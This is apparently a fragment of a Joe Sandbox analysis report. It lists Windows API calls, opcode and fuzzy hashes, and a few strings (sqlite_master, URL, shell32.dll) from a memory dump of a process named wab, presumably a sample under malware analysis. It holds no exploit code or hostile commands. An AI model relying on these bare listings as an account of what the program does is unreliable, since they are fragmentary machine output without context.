                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@$memcpy$mallocwcslen
                  • String ID:
                  • API String ID: 3023356884-0
                  • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                  • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                  • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                  • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy
                  • String ID: @
                  • API String ID: 3510742995-2766056989
                  • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                  • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                  • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                  • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@??3@memcpymemset
                  • String ID:
                  • API String ID: 1865533344-0
                  • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                  • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                  • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                  • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                  APIs
                  • strlen.MSVCRT ref: 0040B0D8
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                    • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                    • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                  • memcpy.MSVCRT ref: 0040B159
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@$memcpy$mallocstrlen
                  • String ID:
                  • API String ID: 1171893557-0
                  • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                  • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                  • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                  • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                  APIs
                  • memset.MSVCRT ref: 004144E7
                    • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                    • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                  • memset.MSVCRT ref: 0041451A
                  • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                  • String ID:
                  • API String ID: 1127616056-0
                  • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                  • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                  • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                  • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memset
                  • String ID: sqlite_master
                  • API String ID: 438689982-3163232059
                  • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                  • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                  • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                  • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                  APIs
                  • SHGetMalloc.SHELL32(?), ref: 00414D9A
                  • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                  • wcscpy.MSVCRT ref: 00414DF3
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: BrowseFolderFromListMallocPathwcscpy
                  • String ID:
                  • API String ID: 3917621476-0
                  • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                  • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                  • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                  • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                  APIs
                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                    • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                  • _snwprintf.MSVCRT ref: 00410FE1
                  • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                  • _snwprintf.MSVCRT ref: 0041100C
                  • wcscat.MSVCRT ref: 0041101F
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                  • String ID:
                  • API String ID: 822687973-0
                  • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                  • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                  • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                  • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                  APIs
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                  • malloc.MSVCRT ref: 00417459
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7591DF80,?,0041755F,?), ref: 00417478
                  • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$??3@malloc
                  • String ID:
                  • API String ID: 4284152360-0
                  • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                  • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                  • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                  • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                  APIs
                  • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                  • RegisterClassW.USER32(?), ref: 00412428
                  • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                  • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: HandleModule$ClassCreateRegisterWindow
                  • String ID:
                  • API String ID: 2678498856-0
                  • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                  • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                  • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                  • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                  APIs
                  • GetDlgItem.USER32(?,?), ref: 00409B40
                  • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                  • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                  • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: MessageSend$Item
                  • String ID:
                  • API String ID: 3888421826-0
                  • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                  • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                  • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                  • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                  APIs
                  • memset.MSVCRT ref: 00417B7B
                  • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                  • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                  • GetLastError.KERNEL32 ref: 00417BB5
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: File$ErrorLastLockUnlockmemset
                  • String ID:
                  • API String ID: 3727323765-0
                  • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                  • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                  • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                  • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                  APIs
                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                  • malloc.MSVCRT ref: 00417407
                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                  • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$??3@malloc
                  • String ID:
                  • API String ID: 4284152360-0
                  • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                  • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                  • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                  • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                  APIs
                  • memset.MSVCRT ref: 0040F673
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                  • strlen.MSVCRT ref: 0040F6A2
                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                  • String ID:
                  • API String ID: 2754987064-0
                  • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                  • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                  • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                  • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                  APIs
                  • memset.MSVCRT ref: 0040F6E2
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                  • strlen.MSVCRT ref: 0040F70D
                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                  • String ID:
                  • API String ID: 2754987064-0
                  • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                  • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                  • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                  • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                  APIs
                  • memset.MSVCRT ref: 00402FD7
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                  • strlen.MSVCRT ref: 00403006
                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                  • String ID:
                  • API String ID: 2754987064-0
                  • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                  • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                  • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                  • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                  APIs
                    • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                    • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                    • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                  • SetBkMode.GDI32(?,00000001), ref: 004143A2
                  • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                  • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                  • GetStockObject.GDI32(00000000), ref: 004143C6
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                  • String ID:
                  • API String ID: 764393265-0
                  • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                  • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                  • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                  • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                  APIs
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                  • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Time$System$File$LocalSpecific
                  • String ID:
                  • API String ID: 979780441-0
                  • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                  • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                  • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                  • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                  APIs
                  • memcpy.MSVCRT ref: 004134E0
                  • memcpy.MSVCRT ref: 004134F2
                  • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                  • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$DialogHandleModuleParam
                  • String ID:
                  • API String ID: 1386444988-0
                  • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                  • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                  • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                  • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                  • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                  • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                  • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                  APIs
                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                  • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: InvalidateMessageRectSend
                  • String ID: d=E
                  • API String ID: 909852535-3703654223
                  • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                  • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                  • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                  • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                  APIs
                  • wcschr.MSVCRT ref: 0040F79E
                  • wcschr.MSVCRT ref: 0040F7AC
                    • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                    • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: wcschr$memcpywcslen
                  • String ID: "
                  • API String ID: 1983396471-123907689
                  • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                  • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                  • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                  • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                  APIs
                    • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                  • _memicmp.MSVCRT ref: 0040C00D
                  • memcpy.MSVCRT ref: 0040C024
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: FilePointer_memicmpmemcpy
                  • String ID: URL
                  • API String ID: 2108176848-3574463123
                  • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                  • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                  • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                  • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _snwprintfmemcpy
                  • String ID: %2.2X
                  • API String ID: 2789212964-323797159
                  • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                  • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                  • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                  • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _snwprintf
                  • String ID: %%-%d.%ds
                  • API String ID: 3988819677-2008345750
                  • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                  • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                  • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                  • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                  APIs
                  • memset.MSVCRT ref: 0040E770
                  • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: MessageSendmemset
                  • String ID: F^@
                  • API String ID: 568519121-3652327722
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: PlacementWindowmemset
                  • String ID: WinPos
                  • API String ID: 4036792311-2823255486
                  APIs
                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                  • wcsrchr.MSVCRT ref: 0040DCE9
                  • wcscat.MSVCRT ref: 0040DCFF
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: FileModuleNamewcscatwcsrchr
                  • String ID: _lng.ini
                  • API String ID: 383090722-1948609170
                  APIs
                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                  • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                  • String ID: SHGetSpecialFolderPathW$shell32.dll
